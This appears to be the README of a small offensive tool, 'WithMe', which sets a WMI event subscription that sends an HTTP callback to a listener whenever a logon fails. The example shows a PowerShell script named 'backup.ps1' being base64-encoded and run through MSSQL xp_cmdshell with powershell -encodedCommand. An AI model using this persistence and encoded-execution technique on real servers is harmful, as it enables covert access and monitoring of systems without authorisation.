# WithMe

A simple WMI filter / trigger / shell. As written, triggers a HTTP callback upon logon failure.

![Example Callback](https://gitlab.com/poerhiza/withme/-/raw/main/example.svg?inline=false)

## Examples

*start server.py listening*
*update backup.ps1*

### From MSSQL

```bash
cat backup.ps1 | iconv -f UTF8 -t UTF16LE | base64 -w0
# ...
# EXEC master..xp_cmdshell 'powershell.exe -encodedCommand "<B64 of backup.ps1>"'
```
